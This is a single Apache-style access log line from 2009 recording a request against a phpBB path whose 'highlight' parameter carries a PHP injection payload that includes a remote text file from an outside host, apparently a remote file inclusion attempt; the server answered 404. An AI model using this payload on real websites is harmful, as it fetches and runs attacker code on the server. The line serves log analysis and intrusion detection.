174.143.155.52 - - [13/Nov/2009:03:50:03 -0500] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
